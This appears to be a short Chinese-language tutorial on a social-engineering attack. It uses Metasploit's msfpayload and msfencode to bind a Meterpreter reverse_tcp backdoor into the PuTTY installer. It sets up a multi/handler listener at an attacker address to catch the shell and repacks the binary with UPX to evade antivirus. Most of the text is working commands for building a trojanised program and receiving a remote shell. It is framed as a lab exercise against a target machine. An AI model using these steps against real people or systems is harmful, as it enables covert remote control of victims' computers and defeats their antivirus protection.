社会工程学攻击案例-伪装木马

社会工程学攻击案例-伪装木马

msfpayload 做后门程序

root@bt:~# mkdir /root/example_01
//生成目录,名称为example_01
//将putty软件拷贝到此目录下(可以在gns3安装目录下找到或者到网上下载,注意要英文版)
root@bt:~# cd /root/example_01/   //进入此文件夹
root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=80 R | msfencode -t exe -x /root/example_01/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5
//生成后门程序,并将后门捆绑到putty软件(其他软件也通用)
//管道符,将前面做好的指令传递给后面指令
root@bt:~/example_01# ll    //查看本目录下增加的带有后门的putty程序

将目录下的 putty_backdoor.exe 拷贝到靶机。

启动监听程序。

root@bt:/pentest/exploits/framework2# /opt/framework/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=80 E

msf > use exploit/multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 10.10.10.131
msf  exploit(handler) > set LPORT 80
msf  exploit(handler) > exploit

在靶机上安装杀毒软件,发现部分杀毒软件可以识别后台木马。通过 UPX 来实现加强免杀。

root@bt:~/example_01# upx -6 -o putty_backdoor_upx6.exe putty_backdoor.exe

将 putty_backdoor_upx6 软件放在靶机上,再次测试杀毒。

经验分享 程序员 微信小程序 职场和发展